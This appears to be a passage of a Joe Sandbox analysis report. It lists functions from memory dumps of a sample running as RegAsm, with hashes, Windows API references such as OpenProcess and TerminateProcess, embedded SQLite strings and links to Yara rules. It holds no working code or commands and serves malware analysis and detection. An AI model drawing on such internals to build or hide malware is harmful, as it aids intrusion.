
Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a864df1d5a5134e7b78c5d84b1fd10356f64a92a0c4356e68f45d096cfd8ad
Instruction ID: d556c76d491aa2ca7153478779aa21b61c7fa3c74b7d65288a7022799d622953
Opcode Fuzzy Hash: 71a864df1d5a5134e7b78c5d84b1fd10356f64a92a0c4356e68f45d096cfd8ad
Instruction Fuzzy Hash: 5C028EB09047998FE704DF25E884B1AB7E4FF48308F084A2DED4A97351D775EA54CBA2

Function 192BAF80 Relevance: 7.8, APIs: 5, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f76e511e62cd5052a29faac55ecb1be7812b630949c8248eb3c0130b893bd8b
Instruction ID: 300b3d2c3617cb81d57980ead2b3d0915092a3479912225f5ca3faeb6b968997
Opcode Fuzzy Hash: 6f76e511e62cd5052a29faac55ecb1be7812b630949c8248eb3c0130b893bd8b
Instruction Fuzzy Hash: 14A185709016A9DBE7189F35D9C8A1A33B8FF0038AF184224EE0A9A251D735E554CBF7

Function 00411056 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041105B
memset.MSVCRT ref: 0041107D

Part of subcall function 00410CAC: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
Part of subcall function 00410CAC: HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
Part of subcall function 00410CAC: wsprintfW.USER32 ref: 00410CCF

OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 1628159694-0
Opcode ID: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
Instruction ID: 36bd9fcb495497175832ad1b73d2d45116fcd412ea3aab7de57d6fc10e614e88
Opcode Fuzzy Hash: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
Instruction Fuzzy Hash: 31314C72D01128ABCB21EB90DD85DEFBB79FF09350F10012AF645E2190DB345A85CBE4

Function 00410EB9 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EC5
lstrcpyn.KERNEL32(0063F728,?,00000000,00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EDE
lstrlenA.KERNEL32(00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EF0
wsprintfA.USER32 ref: 00410F02

Strings

%s%s, xrefs: 00410EFC

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 8aecc557134a6b5c81efd88c64ae6e5cf3721d074007ce6fff9da3b286229787
Instruction ID: 0532199afd7fb71505dfc6c42552052b069b43126b475e5890b68da579568c33
Opcode Fuzzy Hash: 8aecc557134a6b5c81efd88c64ae6e5cf3721d074007ce6fff9da3b286229787
Instruction Fuzzy Hash: E0F054326002297BDB011F59AC48A9BBFAEEF5A765F04402AFD0893211C7765D1187E5

Function 0041A151 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041A15D

Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344

__getptd.LIBCMT ref: 0041A174
__amsg_exit.LIBCMT ref: 0041A182
__lock.LIBCMT ref: 0041A192
__updatetlocinfoEx_nolock.LIBCMT ref: 0041A1A6

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 8c78c0af6140777fa1bdc48fcf2f5a2d54df20f957d87e2b9a9cf5d36f6c81fa
Instruction ID: 4e3a2c4d0a1e278f0847d9c725dca8c59e2d9a2086bcf68a1c39e98a36d27e27
Opcode Fuzzy Hash: 8c78c0af6140777fa1bdc48fcf2f5a2d54df20f957d87e2b9a9cf5d36f6c81fa
Instruction Fuzzy Hash: 8FF06232A46610AADB25BB665806BCD32905F00729F54010FF410662C2CA7C59D1CA5F

Function 00407893 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407898

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

lstrlenA.KERNEL32(00000000), ref: 00407DE7
lstrlenA.KERNEL32(00000000), ref: 00407DFB

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

#, xrefs: 00407E2B

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
String ID: #
API String ID: 3207582090-1885708031
Opcode ID: 1b9626c6bcab94b235201102c17a8f5006894b56bd466bfe6cc055c949eb141a
Instruction ID: 90a0b065f2ce581d2774c055680d4a4ab4ac60e8fee4b98af290d1c90ab0784c
Opcode Fuzzy Hash: 1b9626c6bcab94b235201102c17a8f5006894b56bd466bfe6cc055c949eb141a
Instruction Fuzzy Hash: 41126C71804249EADB15EBE0C956BEEBB74AF28308F5040BEE406725C2DF78274DDB65

Function 193573C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 1935751C

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: 209fbf80df72ce4c19020d9abce7c4dc8bc14c8dbf7b629c519d14c6016ef38b
Instruction ID: 00a8d157b0083550d1d7dd2893562e536e40db5b1c827146a93e86c31f7c16f9
Opcode Fuzzy Hash: 209fbf80df72ce4c19020d9abce7c4dc8bc14c8dbf7b629c519d14c6016ef38b
Instruction Fuzzy Hash: 58B1B0B18043959FE716CF24C884B5ABBE8AF48348F084A1DE88B87291D774E545CBA6

Function 1924F7F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 1924F8ED

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: 2f3bf4e83ad3391131396c97b53bc3768c9a826c8bc6195d2d31db2277726573
Instruction ID: f4ec49474b172d16f3b41ea615c9e63c147c16cdf90c73e08e8e240e1b91c108
Opcode Fuzzy Hash: 2f3bf4e83ad3391131396c97b53bc3768c9a826c8bc6195d2d31db2277726573
Instruction Fuzzy Hash: 4D11E176C046126BDB05EE24AD08FCA37A15F96320F2D5359E4542B1E2E77095C4C3D2

Function 19247D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap1, xrefs: 19247DC5
winShmMap3, xrefs: 19247F1D
winShmMap2, xrefs: 19247E1F

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: 1cc02c4ae08e3cdc934e0f15e67b469abc6d5801364cab95e98c4ac453f800d2
Instruction ID: 2a5ef58b933ed32191ff11631cefe05949410691b4e7cf2bdd2f4d493c0c1766
Opcode Fuzzy Hash: 1cc02c4ae08e3cdc934e0f15e67b469abc6d5801364cab95e98c4ac453f800d2
Instruction Fuzzy Hash: B961FDB16007429FD718CF24CD80A27B7E9FF84744F2A492DF99697291EB30E904CB92

Function 193E0FC2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 193E0FE7
CatchIt.LIBVCRUNTIME ref: 193E10CD

Strings

MOC, xrefs: 193E0FF9
RCC, xrefs: 193E1001

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: a36a9b1f22dd72e3d0c9afef04becaf1469c5c8cd574ee20d13bc7bda14987d7
Instruction ID: 0511632f3c9d3566ce83549a37ad27b70975ef59c46ca9f46874781e71d0d407
Opcode Fuzzy Hash: a36a9b1f22dd72e3d0c9afef04becaf1469c5c8cd574ee20d13bc7bda14987d7
Instruction Fuzzy Hash: 80413775900299EFCF15CF94CD81AEEBBB5FF48300F188299F914A7261D235AE50DB50

Function 19244CE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

temp, xrefs: 192D3F91
wrong number of vtable arguments, xrefs: 192D3FA9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: temp$wrong number of vtable arguments
API String ID: 0-2849069181
Opcode ID: 5bcd7010add141c4b9d0ff94215ab86dac4246c9f60feb49bb6cc98b24134300
Instruction ID: dce4b50687e78ee37ec0560e5fd44ad7f66783b71daef4cd17cd64eac3456112
Opcode Fuzzy Hash: 5bcd7010add141c4b9d0ff94215ab86dac4246c9f60feb49bb6cc98b24134300
Instruction Fuzzy Hash: D25105B59043468FC718CF14D9404AAFBF1FF89708F584A6DE48697391D332EA4ACB92

Function 192735E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192735EA
misuse, xrefs: 192735F4
%s at line %d of [%.10s], xrefs: 192735F9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: e1666eae90ff0f3bce646602b4fd5add0bbe200cc13dd2e88d8881a470436ffb
Instruction ID: ff708e2ab29041559964733e821da255eadd5c1a1f7d59be05aa2ca5e3b00d10
Opcode Fuzzy Hash: e1666eae90ff0f3bce646602b4fd5add0bbe200cc13dd2e88d8881a470436ffb
Instruction Fuzzy Hash: A551F6F5A00316AFDB18CF14D886A56BBA5FF24724F1D8258FC59AB291E331E910CB91

Function 192E96B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192E97E0
%s at line %d of [%.10s], xrefs: 192E97EF
database corruption, xrefs: 192E97EA

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1a3a0edb48cd07cce9fac5f3bd4ca4f046338aa20a9bf27462883cfe659d1009
Instruction ID: bd46a829e43c10196b3308ddd0bedab8e3f9b8b876899841b59cc40488db8020
Opcode Fuzzy Hash: 1a3a0edb48cd07cce9fac5f3bd4ca4f046338aa20a9bf27462883cfe659d1009
Instruction Fuzzy Hash: 654129BA3047914FD7218F78D4806D3FFE09F41211F5C48AFD2D58B692E222E485D751

Function 193B5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 193B5976
misuse, xrefs: 193B5980
%s at line %d of [%.10s], xrefs: 193B5985

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: b553f85a0c03175788b2051f40d2c677611c33adcc581e06003002c9b88d07b6
Instruction ID: 388b42a99aa0f9ef53e5925cc295ed052fcad7a4e1e51f447dc8e8e19b71ad63
Opcode Fuzzy Hash: b553f85a0c03175788b2051f40d2c677611c33adcc581e06003002c9b88d07b6
Instruction Fuzzy Hash: 474129769143419BD311CB54CC80B9AB7E8EF85320F8C1669FC49AF681E325EA94C7A2

Function 193C8850 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 193C895F
os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 193C88E2

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
